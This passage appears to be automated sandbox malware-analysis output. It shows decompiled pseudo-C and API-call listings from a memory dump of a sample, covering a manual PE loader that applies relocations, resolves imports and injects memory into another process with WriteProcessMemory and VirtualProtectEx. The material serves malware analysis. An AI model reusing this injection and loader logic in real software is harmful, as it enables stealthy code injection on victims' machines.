						__eflags =  *(_t331 + 0x70);
						if( *(_t331 + 0x70) == 0) {
							E00397920(_t240, _t331);
						}
						_t150 =  *(_t333 - 0x20);
						__eflags = _t150;
						if(_t150 != 0) {
							E0039BB40(_t150);
						}
						_t145 = _t331 + 0x58; // 0x9b8d00
						return  *_t145;
					}
					_t155 = E003A1D90(_t239,  *(_t333 - 0x20)); // executed
					 *(_t333 - 0x20) = _t155;
					memset(_t155, 0, _t239);
					_t335 = _t335 + 0x14;
					_t157 = E00397B30(_t331,  *((intOrPtr*)(_t333 + 8)), _t316,  *(_t333 - 0x20), _t239); // executed
					if(_t157 == 0) {
						goto L78;
					}
					_t254 =  *(_t333 - 0x10);
					_t158 =  *_t254;
					if( *_t254 == 0) {
						goto L8;
					}
					_t12 =  &(_t254[2]); // 0xfe78858d
					_t13 = _t331 + 0x74; // 0xffff95d7
					_t238 = E00397B30(_t331,  *((intOrPtr*)(_t333 + 8)), _t316,  *_t12 +  *_t13, _t158); // executed
					if(_t238 == 0) {
						goto L78;
					}
					L8:
					 *(_t333 - 0x10) =  &(( *(_t333 - 0x10))[0x14]);
					_t160 =  *(_t333 - 0x18) + 1;
					 *(_t333 - 0x18) = _t160;
				} while (_t160 < ( *( *((intOrPtr*)(_t333 - 4)) + 6) & 0x0000ffff));
				if( *(_t333 - 0xc) == 0) {
					L21:
					_t318 =  *((intOrPtr*)(_t333 - 0x1c));
					if(_t318 == 0) {
						L42:
						_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t333 - 4)) + 0x78));
						 *((intOrPtr*)(_t333 - 0x1c)) = _t241;
						_t319 = E0039DF30(_t331, _t241);
						 *(_t333 - 0x18) = _t319;
						__eflags = _t319;
						if(_t319 == 0) {
							goto L78;
						}
						 *(_t333 - 0x14) = E0039DF30(_t331,  *((intOrPtr*)(_t319 + 0x1c)));
						 *(_t333 - 0x24) = E0039DF30(_t331,  *((intOrPtr*)(_t319 + 0x20)));
						 *((intOrPtr*)(_t333 - 0x2c)) = E0039DF30(_t331,  *((intOrPtr*)(_t319 + 0x24)));
						__eflags =  *(_t319 + 0x14);
						 *(_t333 - 0x10) =  *((intOrPtr*)( *((intOrPtr*)(_t333 - 4)) + 0x7c)) + _t241;
						 *(_t333 - 0xc) = 0;
						if( *(_t319 + 0x14) <= 0) {
							L61:
							__eflags =  *(_t331 + 0x98);
							if( *(_t331 + 0x98) == 0) {
								goto L78;
							}
							__eflags =  *(_t331 + 0x9c);
							if( *(_t331 + 0x9c) == 0) {
								goto L78;
							}
							__eflags =  *(_t331 + 0xa0);
							if( *(_t331 + 0xa0) == 0) {
								goto L78;
							}
							__eflags =  *(_t331 + 0xa4);
							if( *(_t331 + 0xa4) == 0) {
								goto L78;
							}
							_t169 =  *((intOrPtr*)(_t333 - 4));
							_t242 = 0;
							__eflags = 0 -  *((intOrPtr*)(_t169 + 6));
							if(0 >=  *((intOrPtr*)(_t169 + 6))) {
								L76:
								 *((intOrPtr*)(_t331 + 0x58)) =  *((intOrPtr*)(_t333 - 8));
								_t171 = E0039E6F0(_t331,  *((intOrPtr*)(_t333 - 8)), 1, 0); // executed
								__eflags = _t171;
								if(_t171 != 0) {
									 *(_t331 + 0x70) = 1;
								}
								goto L78;
							}
							_t321 =  *((intOrPtr*)(_t333 - 0x30)) + 0x24;
							__eflags = _t321;
							while(1) {
								_t172 =  *_t321;
								__eflags = _t172 & 0x20000000;
								if((_t172 & 0x20000000) == 0) {
									__eflags = _t172 & 0x40000000;
									if((_t172 & 0x40000000) == 0) {
										asm("sbb eax, eax");
										_t176 = ( ~(_t172 & 0x80000000) & 0x00000007) + 1;
										__eflags = ( ~(_t172 & 0x80000000) & 0x00000007) + 1;
									} else {
										asm("sbb eax, eax");
										_t176 = ( ~(_t172 & 0x80000000) & 0x00000002) + 2;
									}
								} else {
									__eflags = _t172 & 0x40000000;
									if((_t172 & 0x40000000) == 0) {
										asm("sbb eax, eax");
										_t176 = ( ~(_t172 & 0x80000000) & 0x00000070) + 0x10;
									} else {
										asm("sbb eax, eax");
										_t176 = ( ~(_t172 & 0x80000000) & 0x00000020) + 0x20;
									}
								}
								_t134 = _t321 - 0x1c; // 0xec81ec8b
								_t135 = _t321 - 0x18; // 0x588
								_t178 = E0039D9D0(_t331,  *((intOrPtr*)(_t333 + 8)),  *_t135 +  *((intOrPtr*)(_t333 - 8)),  *_t134, _t176); // executed
								__eflags = _t178;
								if(_t178 == 0) {
									goto L78;
								}
								_t264 =  *((intOrPtr*)(_t333 - 4));
								_t242 = _t242 + 1;
								_t321 = _t321 + 0x28;
								__eflags = _t242 - ( *(_t264 + 6) & 0x0000ffff);
								if(_t242 < ( *(_t264 + 6) & 0x0000ffff)) {
									continue;
								}
								goto L76;
							}
							goto L78;
						} else {
							goto L44;
						}
						do {
							L44:
							_t188 =  *(_t333 - 0x14);
							_t243 =  *_t188;
							 *(_t333 - 0x14) =  &(_t188[1]);
							__eflags = _t243;
							if(_t243 == 0) {
								goto L60;
							}
							__eflags = _t243 -  *((intOrPtr*)(_t333 - 0x1c));
							if(_t243 <  *((intOrPtr*)(_t333 - 0x1c))) {
								L47:
								_t267 =  *( *(_t333 - 0x18) + 0x18);
								_t192 = 0;
								__eflags = _t267;
								if(_t267 == 0) {
									goto L60;
								}
								_t305 =  *(_t333 - 0xc);
								while(1) {
									_t322 =  *((intOrPtr*)(_t333 - 0x2c));
									__eflags = ( *(_t322 + _t192 * 2) & 0x0000ffff) - _t305;
									if(( *(_t322 + _t192 * 2) & 0x0000ffff) == _t305) {
										break;
									}
									_t192 = _t192 + 1;
									__eflags = _t192 - _t267;
									if(_t192 < _t267) {
										continue;
									}
									goto L60;
								}
								_t324 = E0039DF30(_t331,  *((intOrPtr*)( *(_t333 - 0x24) + _t192 * 4)));
								E00396CB0(_t333 - 0x94, 0x8b);
								_t196 =  *0x3b8628; // 0x593938
								_t335 = _t335 + 8;
								_t197 =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x4c))))(_t324, _t333 - 0x94);
								__eflags = _t197;
								if(_t197 != 0) {
									E00396CB0(_t333 - 0x94, 0x8c);
									_t308 =  *0x3b8628; // 0x593938
									_t335 = _t335 + 8;
									_t201 =  *((intOrPtr*)( *((intOrPtr*)(_t308 + 0x4c))))(_t324, _t333 - 0x94);
									__eflags = _t201;
									if(_t201 != 0) {
										E00396CB0(_t333 - 0x94, 0x8d);
										_t272 =  *0x3b8628; // 0x593938
										_t335 = _t335 + 8;
										_t204 =  *((intOrPtr*)( *((intOrPtr*)(_t272 + 0x4c))))(_t324, _t333 - 0x94);
										__eflags = _t204;
										if(_t204 != 0) {
											E00396CB0(_t333 - 0x94, 0x8e);
											_t206 =  *0x3b8628; // 0x593938
											_t335 = _t335 + 8;
											_t207 =  *((intOrPtr*)( *((intOrPtr*)(_t206 + 0x4c))))(_t324, _t333 - 0x94);
											__eflags = _t207;
											if(_t207 == 0) {
												_t244 = _t243 +  *((intOrPtr*)(_t333 - 8));
												__eflags = _t244;
												 *(_t331 + 0xa4) = _t244;
											}
										} else {
											 *(_t331 + 0xa0) = _t243 +  *((intOrPtr*)(_t333 - 8));
										}
									} else {
										 *(_t331 + 0x9c) = _t243 +  *((intOrPtr*)(_t333 - 8));
									}
								} else {
									 *(_t331 + 0x98) = _t243 +  *((intOrPtr*)(_t333 - 8));
								}
								goto L60;
							}
							__eflags = _t243 -  *(_t333 - 0x10);
							if(_t243 <  *(_t333 - 0x10)) {
								goto L60;
							}
							goto L47;
							L60:
							_t265 =  *(_t333 - 0x18);
							_t191 =  *(_t333 - 0xc) + 1;
							 *(_t333 - 0xc) = _t191;
							__eflags = _t191 -  *((intOrPtr*)(_t265 + 0x14));
						} while (_t191 <  *((intOrPtr*)(_t265 + 0x14)));
						goto L61;
					}
					while( *_t318 != 0 ||  *((intOrPtr*)(_t318 + 0x10)) != 0 ||  *((intOrPtr*)(_t318 + 8)) != 0 ||  *((intOrPtr*)(_t318 + 0xc)) != 0 ||  *((intOrPtr*)(_t318 + 4)) != 0) {
						_t208 =  *((intOrPtr*)(_t318 + 0xc));
						 *(_t333 - 0xc) = 0;
						_t359 = _t208;
						if(_t208 == 0) {
							continue;
						}
						_t210 = E003917D0(_t239, _t331, _t318, _t331, _t359, E0039DF30(_t331, _t208)); // executed
						 *(_t333 - 0x18) = _t210;
						if(_t210 == 0) {
							goto L78;
						}
						_t325 =  *((intOrPtr*)(_t333 - 0x1c));
						_t211 =  *_t325;
						if( *_t325 == 0) {
							_t211 =  *((intOrPtr*)(_t325 + 0x10));
						}
						_t212 = E0039DF30(_t331, _t211);
						_t239 =  *((intOrPtr*)(_t325 + 0x10)) +  *((intOrPtr*)(_t333 - 8));
						 *(_t333 - 0x14) = _t212;
						_t213 =  *_t212;
						if(_t213 == 0) {
							L41:
							_t318 = _t325 + 0x14;
							 *((intOrPtr*)(_t333 - 0x1c)) = _t318;
							continue;
						} else {
							_t326 =  *(_t333 - 0x18);
							while(1) {
								_t278 = _t331;
								_t363 = _t213;
								if(_t213 >= 0) {
									_t214 = E0039DF30(_t278, _t213);
									_t215 = _t214 + 2;
									__eflags = _t214 + 2;
									_t278 = _t331;
								} else {
									_t215 = _t213 & 0x0000ffff;
								}
								_t216 = E003965F0(_t278, _t331, _t363, _t326, _t215); // executed
								 *(_t333 - 0xc) = _t216;
								if(_t216 == 0) {
									goto L78;
								}
								_t63 = _t331 + 0x5c; // 0x8b000000
								_t218 = E00397B30(_t331,  *_t63, _t239, _t333 - 0xc, 4); // executed
								if(_t218 == 0) {
									goto L78;
								}
								_t220 =  *(_t333 - 0x14) + 4;
								 *(_t333 - 0x14) = _t220;
								_t213 =  *_t220;
								_t239 = _t239 + 4;
								if(_t213 != 0) {
									continue;
								}
								_t325 =  *((intOrPtr*)(_t333 - 0x1c));
								goto L41;
							}
							goto L78;
						}
					}
					goto L42;
				}
				_t239 = E0039DF30(_t331,  *((intOrPtr*)( *((intOrPtr*)(_t333 - 4)) + 0xa0)));
				if(_t239 == 0) {
					goto L78;
				}
				_t223 = 0;
				if( *_t239 == 0) {
					goto L21;
				} else {
					goto L12;
				}
				do {
					L12:
					_t284 =  *(_t239 + 4) - 8 >> 1;
					 *(_t333 - 0x14) = _t284;
					_t26 = _t239 + 8; // 0x8
					 *(_t333 - 0x18) = _t223;
					 *(_t333 - 0x28) = _t223;
					 *(_t333 - 0x24) = _t223;
					 *(_t333 - 0x10) = _t26;
					if(_t284 == 0) {
						goto L20;
					} else {
						goto L13;
					}
					do {
						L13:
						_t224 =  *( *(_t333 - 0x10)) & 0x0000ffff;
						_t287 = _t224 >> 0xc;
						if(_t287 != 3) {
							__eflags = _t287 - 0xa;
							if(_t287 != 0xa) {
								goto L18;
							} else {
								_t329 = (_t224 & 0x00000fff) +  *_t239;
								_t227 = E0039DF30(_t331, _t329);
								_push(8);
								asm("adc edx, [eax+0x4]");
								_t330 = _t329 +  *((intOrPtr*)(_t333 - 8));
								__eflags = _t330;
								_push(_t333 - 0x28);
								 *(_t333 - 0x24) = 0;
								_push(_t330);
								 *(_t333 - 0x28) =  *(_t333 - 0xc) +  *_t227;
								_push( *((intOrPtr*)(_t333 + 8)));
								goto L17;
							}
						} else {
							_t327 = (_t224 & 0x00000fff) +  *_t239;
							_t232 = E0039DF30(_t331, _t327);
							_push(4);
							_push(_t333 - 0x18);
							 *(_t333 - 0x18) =  *_t232 +  *(_t333 - 0xc);
							_push(_t327 +  *((intOrPtr*)(_t333 - 8)));
							_push( *((intOrPtr*)(_t333 + 8)));
							L17:
							if(E00397B30(_t331) == 0) {
								goto L78;
							}
						}
						L18:
						 *(_t333 - 0x10) =  &(( *(_t333 - 0x10))[1]);
						_t45 = _t333 - 0x14;
						 *_t45 =  *(_t333 - 0x14) - 1;
					} while ( *_t45 != 0);
					_t223 = 0;
					L20:
					_t239 = _t239 +  *(_t239 + 4);
				} while ( *_t239 != _t223);
				goto L21;
			}

































































    0x0039b4fc
    0x0039b500
    0x0039b500
    0x0039b503
    0x0039b506
    0x0039b50a
    0x0039b50c
    0x0039b50c
    0x0039b511
    0x0039b514
    0x0039b51a
    0x0039b51c
    0x0039b521
    0x0039b522
    0x0039b523
    0x0039b526
    0x0039b52b
    0x0039b52f
    0x0039ba12
    0x0039ba12
    0x0039ba14
    0x0039ba18
    0x0039ba1c
    0x0039ba1c
    0x0039ba21
    0x0039ba24
    0x0039ba26
    0x0039ba29
    0x0039ba2e
    0x0039ba31
    0x0039ba38
    0x0039ba38
    0x0039b53a
    0x0039b543
    0x0039b546
    0x0039b551
    0x0039b55a
    0x0039b561
    0x00000000
    0x00000000
    0x0039b567
    0x0039b56a
    0x0039b56e
    0x00000000
    0x00000000
    0x0039b571
    0x0039b574
    0x0039b57f
    0x0039b586
    0x00000000
    0x00000000
    0x0039b58c
    0x0039b596
    0x0039b59a
    0x0039b59b
    0x0039b59e
    0x0039b5aa
    0x0039b68f
    0x0039b68f
    0x0039b694
    0x0039b774
    0x0039b777
    0x0039b77d
    0x0039b785
    0x0039b787
    0x0039b78a
    0x0039b78c
    0x00000000
    0x00000000
    0x0039b7a3
    0x0039b7b1
    0x0039b7b9
    0x0039b7c4
    0x0039b7c8
    0x0039b7cb
    0x0039b7d2
    0x0039b91f
    0x0039b91f
    0x0039b926
    0x00000000
    0x00000000
    0x0039b92c
    0x0039b933
    0x00000000
    0x00000000
    0x0039b939
    0x0039b940
    0x00000000
    0x00000000
    0x0039b946
    0x0039b94d
    0x00000000
    0x00000000
    0x0039b953
    0x0039b958
    0x0039b95a
    0x0039b95e
    0x0039b9f5
    0x0039b9ff
    0x0039ba02
    0x0039ba07
    0x0039ba09
    0x0039ba0b
    0x0039ba0b
    0x00000000
    0x0039ba09
    0x0039b967
    0x0039b967
    0x0039b970
    0x0039b970
    0x0039b972
    0x0039b977
    0x0039b9a2
    0x0039b9a7
    0x0039b9c1
    0x0039b9c6
    0x0039b9c6
    0x0039b9a9
    0x0039b9b0
    0x0039b9b5
    0x0039b9b5
    0x0039b979
    0x0039b979
    0x0039b97e
    0x0039b998
    0x0039b99d
    0x0039b980
    0x0039b987
    0x0039b98c
    0x0039b98c
    0x0039b97e
    0x0039b9c7
    0x0039b9ca
    0x0039b9d9
    0x0039b9de
    0x0039b9e0
    0x00000000
    0x00000000
    0x0039b9e2
    0x0039b9e9
    0x0039b9ea
    0x0039b9ed
    0x0039b9ef
    0x00000000
    0x00000000
    0x00000000
    0x0039b9ef
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039b7d8
    0x0039b7d8
    0x0039b7d8
    0x0039b7db
    0x0039b7e0
    0x0039b7e3
    0x0039b7e5
    0x00000000
    0x00000000
    0x0039b7eb
    0x0039b7ee
    0x0039b7f9
    0x0039b7fc
    0x0039b7ff
    0x0039b801
    0x0039b803
    0x00000000
    0x00000000
    0x0039b809
    0x0039b810
    0x0039b810
    0x0039b817
    0x0039b819
    0x00000000
    0x00000000
    0x0039b81b
    0x0039b81c
    0x0039b81e
    0x00000000
    0x00000000
    0x00000000
    0x0039b820
    0x0039b83f
    0x0039b841
    0x0039b846
    0x0039b84e
    0x0039b859
    0x0039b85b
    0x0039b85d
    0x0039b879
    0x0039b87e
    0x0039b887
    0x0039b892
    0x0039b894
    0x0039b896
    0x0039b8af
    0x0039b8b4
    0x0039b8bd
    0x0039b8c8
    0x0039b8ca
    0x0039b8cc
    0x0039b8e5
    0x0039b8ea
    0x0039b8f2
    0x0039b8fd
    0x0039b8ff
    0x0039b901
    0x0039b903
    0x0039b903
    0x0039b906
    0x0039b906
    0x0039b8ce
    0x0039b8d1
    0x0039b8d1
    0x0039b898
    0x0039b89b
    0x0039b89b
    0x0039b85f
    0x0039b862
    0x0039b862
    0x00000000
    0x0039b85d
    0x0039b7f0
    0x0039b7f3
    0x00000000
    0x00000000
    0x00000000
    0x0039b90c
    0x0039b90f
    0x0039b912
    0x0039b913
    0x0039b916
    0x0039b916
    0x00000000
    0x0039b7d8
    0x0039b6a0
    0x0039b6c1
    0x0039b6c4
    0x0039b6cb
    0x0039b6cd
    0x00000000
    0x00000000
    0x0039b6da
    0x0039b6df
    0x0039b6e4
    0x00000000
    0x00000000
    0x0039b6ea
    0x0039b6ed
    0x0039b6f1
    0x0039b6f3
    0x0039b6f3
    0x0039b6f9
    0x0039b701
    0x0039b704
    0x0039b707
    0x0039b70b
    0x0039b769
    0x0039b769
    0x0039b76c
    0x00000000
    0x0039b70d
    0x0039b70d
    0x0039b710
    0x0039b710
    0x0039b712
    0x0039b714
    0x0039b71e
    0x0039b723
    0x0039b723
    0x0039b726
    0x0039b716
    0x0039b716
    0x0039b716
    0x0039b72a
    0x0039b72f
    0x0039b734
    0x00000000
    0x00000000
    0x0039b73a
    0x0039b747
    0x0039b74e
    0x00000000
    0x00000000
    0x0039b757
    0x0039b75a
    0x0039b75d
    0x0039b75f
    0x0039b764
    0x00000000
    0x00000000
    0x0039b766
    0x00000000
    0x0039b766
    0x00000000
    0x0039b710
    0x0039b70b
    0x00000000
    0x0039b6a0
    0x0039b5c1
    0x0039b5c5
    0x00000000
    0x00000000
    0x0039b5cb
    0x0039b5cf
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039b5d5
    0x0039b5d5
    0x0039b5db
    0x0039b5dd
    0x0039b5e0
    0x0039b5e3
    0x0039b5e6
    0x0039b5e9
    0x0039b5ec
    0x0039b5ef
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039b5f5
    0x0039b5f5
    0x0039b5f8
    0x0039b5fe
    0x0039b606
    0x0039b631
    0x0039b635
    0x00000000
    0x0039b637
    0x0039b640
    0x0039b643
    0x0039b64f
    0x0039b651
    0x0039b654
    0x0039b654
    0x0039b65a
    0x0039b65b
    0x0039b661
    0x0039b662
    0x0039b665
    0x00000000
    0x0039b665
    0x0039b608
    0x0039b611
    0x0039b614
    0x0039b621
    0x0039b626
    0x0039b627
    0x0039b62d
    0x0039b62e
    0x0039b666
    0x0039b66f
    0x00000000
    0x00000000
    0x0039b66f
    0x0039b675
    0x0039b675
    0x0039b679
    0x0039b679
    0x0039b679
    0x0039b682
    0x0039b684
    0x0039b684
    0x0039b687
    0x00000000

    APIs
      • Part of subcall function 0039D9D0: VirtualProtectEx.KERNELBASE(0039FEDD,00000040,00002000,?,0039FE81,0039FE81,?,0039B4CC,0039C9A1,00000000,?,00000002,0039C9A1,00000000,C45D89F0,?), ref: 0039D9F8
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 003917D0: GetProcAddress.KERNEL32(00000000,?,?,0039FE81,?), ref: 0039181C
      • Part of subcall function 003965F0: GetProcAddress.KERNEL32(00000000,?,?,00000000,0039C9A1), ref: 0039663A
    • memset.MSVCRT ref: 0039B546
      • Part of subcall function 00397B30: WriteProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0039CCFB,?,?,?,00000070,?,?,?), ref: 00397B5C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039AC90, Relevance: 3.2, APIs: 2, Instructions: 177
    C-Code - Quality: 96%
    			E0039AC90(intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				void* _v16;
				char _v216;
				void* __ebx;
				intOrPtr* _t41;
				short _t42;
				short _t47;
				short _t49;
				short* _t51;
				short _t58;
				short _t60;
				intOrPtr _t64;
				intOrPtr _t66;
				char _t67;
				short* _t71;
				short _t75;
				void* _t86;
				intOrPtr _t89;
				void* _t92;
				void* _t97;

				_t86 = 0;
				_t63 = _a4 + 0x2c;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				if(E0039DA00(_a4 + 0x2c) == 0) {
					L28:
					_t64 = 1;
				} else {
					do {
						_t67 = _v8;
						if(_t67 != 0) {
							E00399FC0(_t67);
							_push(_t67);
							L00391CB0();
							_t97 = _t97 + 4;
						}
						_v8 = 0;
						if(E00392640(_t63, _v12,  &_v8) == 0) {
							goto L27;
						} else {
							_t41 = _v8;
							if( *((intOrPtr*)(_t41 + 8)) != 0) {
								goto L27;
							} else {
								_t71 =  *_t41;
								if(_t71 == 0) {
									goto L27;
								} else {
									_t42 = 0x7fffffff;
									while( *_t71 != 0) {
										_t71 = _t71 + 2;
										_t42 = _t42 - 1;
										if(_t42 != 0) {
											continue;
										} else {
											goto L27;
										}
										goto L30;
									}
									__eflags = _t42;
									if(_t42 == 0) {
										goto L27;
									} else {
										_t92 = 0x7fffffff - _t42 + 6;
										_t12 = _t92 + 2; // 0x7ffffffb
										_t86 = E003A1D90(0x7fffffff + _t12, _t86);
										_t97 = _t97 + 8;
										__eflags = _t86;
										if(__eflags == 0) {
											goto L27;
										} else {
											E00399090(__eflags,  &_v216, 0x14);
											_t16 = _t92 + 1; // 0x7ffffffa
											_t47 = E003A0C10(_t86, _t16,  &_v216,  *_v8);
											_t97 = _t97 + 0x18;
											__eflags = _t47;
											if(__eflags < 0) {
												goto L27;
											} else {
												__eflags = E00396110(_a8, __eflags, 0x3e, _t86);
												if(__eflags == 0) {
													goto L27;
												} else {
													_t49 = E00397560(_t63, __eflags, _a8); // executed
													_t97 = _t97 + 4;
													__eflags = _t49;
													if(_t49 == 0) {
														L29:
														_t64 = _v16;
													} else {
														_t51 =  *((intOrPtr*)(_v8 + 4));
														__eflags = _t51;
														if(_t51 == 0) {
															goto L27;
														} else {
															_t75 = 0x7fffffff;
															while(1) {
																__eflags =  *_t51;
																if( *_t51 == 0) {
																	break;
																}
																_t51 = _t51 + 2;
																_t75 = _t75 - 1;
																__eflags = _t75;
																if(_t75 != 0) {
																	continue;
																} else {
																	goto L27;
																}
																goto L30;
															}
															__eflags = _t75;
															if(_t75 == 0) {
																goto L27;
															} else {
																_t22 = _t92 + 0x7fffffff - _t75 + 2; // 0x7ffffffb
																_t86 = E003A1D90(_t92 + 0x7fffffff - _t75 + _t22, _t86);
																_t97 = _t97 + 8;
																__eflags = _t86;
																if(__eflags == 0) {
																	goto L27;
																} else {
																	E00399090(__eflags,  &_v216, 0xc);
																	_push( *((intOrPtr*)(_v8 + 4)));
																	_t58 = E003A0C10(_t86, _t93 + 1,  &_v216,  *_v8);
																	_t97 = _t97 + 0x1c;
																	__eflags = _t58;
																	if(__eflags < 0) {
																		goto L27;
																	} else {
																		_t95 = _a8;
																		__eflags = E00396110(_a8, __eflags, 0x3e, _t86);
																		if(__eflags == 0) {
																			goto L27;
																		} else {
																			_t60 = E00397560(_t63, __eflags, _t95); // executed
																			_t97 = _t97 + 4;
																			__eflags = _t60;
																			if(_t60 == 0) {
																				goto L29;
																			} else {
																				E00397110(_t63, _v12, 1);
																				goto L27;
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L30;
						L27:
						_t89 = _v12 + 1;
						_v12 = _t89;
					} while (_t89 < E0039DA00(_t63));
					goto L28;
				}
				L30:
				if(_t86 != 0) {
					E0039BB40(_t86);
					_t97 = _t97 + 4;
				}
				_t66 = _v8;
				if(_t66 != 0) {
					E00399FC0(_t66);
					_push(_t66);
					L00391CB0();
				}
				return _t64;
			}
























    0x0039ac9f
    0x0039aca1
    0x0039aca6
    0x0039aca9
    0x0039acac
    0x0039acb6
    0x0039ae54
    0x0039ae54
    0x0039acc0
    0x0039acc0
    0x0039acc0
    0x0039acc5
    0x0039acc9
    0x0039acce
    0x0039accf
    0x0039acd4
    0x0039acd4
    0x0039ace1
    0x0039acef
    0x00000000
    0x0039acf5
    0x0039acf5
    0x0039acfc
    0x00000000
    0x0039ad02
    0x0039ad02
    0x0039ad06
    0x00000000
    0x0039ad0c
    0x0039ad0c
    0x0039ad11
    0x0039ad17
    0x0039ad1a
    0x0039ad1b
    0x00000000
    0x0039ad1d
    0x00000000
    0x0039ad1d
    0x00000000
    0x0039ad1b
    0x0039ad22
    0x0039ad24
    0x00000000
    0x0039ad2a
    0x0039ad31
    0x0039ad34
    0x0039ad3f
    0x0039ad41
    0x0039ad44
    0x0039ad46
    0x00000000
    0x0039ad4c
    0x0039ad55
    0x0039ad67
    0x0039ad6c
    0x0039ad71
    0x0039ad74
    0x0039ad76
    0x00000000
    0x0039ad7c
    0x0039ad87
    0x0039ad89
    0x00000000
    0x0039ad8f
    0x0039ad93
    0x0039ad98
    0x0039ad9b
    0x0039ad9d
    0x0039ae5b
    0x0039ae5b
    0x0039ada3
    0x0039ada6
    0x0039ada9
    0x0039adab
    0x00000000
    0x0039adb1
    0x0039adb1
    0x0039adb6
    0x0039adb6
    0x0039adba
    0x00000000
    0x00000000
    0x0039adbc
    0x0039adbf
    0x0039adbf
    0x0039adc0
    0x00000000
    0x0039adc2
    0x00000000
    0x0039adc2
    0x00000000
    0x0039adc0
    0x0039adc4
    0x0039adc6
    0x00000000
    0x0039adc8
    0x0039add1
    0x0039addc
    0x0039adde
    0x0039ade1
    0x0039ade3
    0x00000000
    0x0039ade5
    0x0039adee
    0x0039adfb
    0x0039ae07
    0x0039ae0c
    0x0039ae0f
    0x0039ae11
    0x00000000
    0x0039ae13
    0x0039ae13
    0x0039ae20
    0x0039ae22
    0x00000000
    0x0039ae24
    0x0039ae25
    0x0039ae2a
    0x0039ae2d
    0x0039ae2f
    0x00000000
    0x0039ae31
    0x0039ae39
    0x00000000
    0x0039ae39
    0x0039ae2f
    0x0039ae22
    0x0039ae11
    0x0039ade3
    0x0039adc6
    0x0039adab
    0x0039ad9d
    0x0039ad89
    0x0039ad76
    0x0039ad46
    0x0039ad24
    0x0039ad06
    0x0039acfc
    0x00000000
    0x0039ae3e
    0x0039ae41
    0x0039ae44
    0x0039ae4c
    0x00000000
    0x0039acc0
    0x0039ae5e
    0x0039ae60
    0x0039ae63
    0x0039ae68
    0x0039ae68
    0x0039ae6b
    0x0039ae70
    0x0039ae74
    0x0039ae79
    0x0039ae7a
    0x0039ae7f
    0x0039ae8a

    APIs
    • ??3@YAXPAX@Z.MSVCRT ref: 0039ACCF
      • Part of subcall function 00392640: ??2@YAPAXI@Z.MSVCRT ref: 0039265D
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 003A0C10: _vsnwprintf.MSVCRT ref: 003A0C42
      • Part of subcall function 00396110: _itow.MSVCRT ref: 0039615E
    • ??3@YAXPAX@Z.MSVCRT ref: 0039AE7A
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 00399FC0: SysFreeString.OLEAUT32(00000000), ref: 00399FD1
      • Part of subcall function 00399FC0: SysFreeString.OLEAUT32(?), ref: 00399FDB
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00395700, Relevance: 3.1, APIs: 2, Instructions: 99
    C-Code - Quality: 93%
    			E00395700(intOrPtr __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				char _v212;
				void* __ebx;
				void* __edi;
				void* _t23;
				signed int _t24;
				void* _t37;
				signed int _t45;
				intOrPtr _t51;
				signed int _t52;
				void* _t53;
				void* _t54;
				void* _t55;

				_t52 = 0;
				_t51 = __ecx;
				_v8 = 0;
				E00399090(__eflags,  &_v212, 0x71);
				_t23 = E00392450( &_v212,  &_v8); // executed
				_t37 = _t23;
				_t24 = _v8;
				_t55 = _t54 + 0x10;
				if(_t37 != 0 || _t24 == 0) {
